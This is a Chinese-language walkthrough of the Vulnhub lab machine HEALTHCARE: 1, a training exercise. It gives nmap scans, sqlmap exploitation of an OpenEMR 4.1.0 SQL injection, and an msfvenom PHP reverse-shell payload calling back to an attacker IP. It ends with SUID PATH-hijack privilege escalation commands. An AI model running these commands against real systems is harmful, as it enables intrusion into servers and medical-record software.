zoukankan      html  css  js  c++  java
  • Vulnhub实战靶场:HEALTHCARE: 1

    一、环境搭建

    1、官网下载连接:https://www.vulnhub.com/entry/healthcare-1,522/

    2、下载之后,使用Oracle VM VirtualBox导入靶场环境

    3、为了正常练习,将靶场的网卡模式设置为桥接模式,启动即可

     

    二、靶场攻略

    1、nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.1.0/24,找到靶场真实ip地址

     2、nmap -A -p- 192.168.1.168,查看服务,开启了21端口和80端口

     3、访问80端口,寻找突破口

     robots.txt文件中的目录都无法访问,不是403就是404

     使用dirbuster的目录字典进行爆破,爆破出一个/openemr目录,也可以访问

     

     4、/openemr为后台目录,并且得到后台为openemr 4.1.0,搜索得知该版本存在SQL注入漏洞

    使用命令:sqlmap -u "http://192.168.1.168/openemr/interface/login/validateUser.php?u=1" 测试,确实存在注入点

    通过注入漏洞,得到后台的数据库账号密码,成功登录后台

     5、在Messages中随便建立一个用户之后,找到一个上传点,在Documents选项中

    使用msf生成php反弹shell的后门脚本,输入命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.122 LPORT=1234 > shell.php

     启动msf,设置好监听payload之后,直接上传生成的php脚本,成功上传并返回文件绝对路径,访问之后成功收到shell

     

     

     6、下一步就是提权了,输入命令:find / -perm -u=s -type f 2>/dev/null

     使用strings /usr/bin/healthcheck,查看文件,发现带有命令

     7、参考链接:https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/,进行提权

    首先执行命令:/usr/bin/healthcheck | more

    发现程序会调用/tmp目录,使用命令:

    cd /tmp

    echo "bin/bash" > ifconfig

    chmod 777 ifconfig

    export PATH=/tmp:$PATH

    /usr/bin/healthcheck,成功提权

     

    得到flag

     

     完

  • 相关阅读:
    计算组合数
    UVa11889
    UVa11388
    二分查找
    UVa12096
    UVa156
    UVa400
    京东2017校招编程题
    华为2017秋招测试工程师笔试试卷
    剑指offer第七章&第八章
  • 原文地址:https://www.cnblogs.com/sym945/p/14140621.html
Copyright © 2011-2022 走看看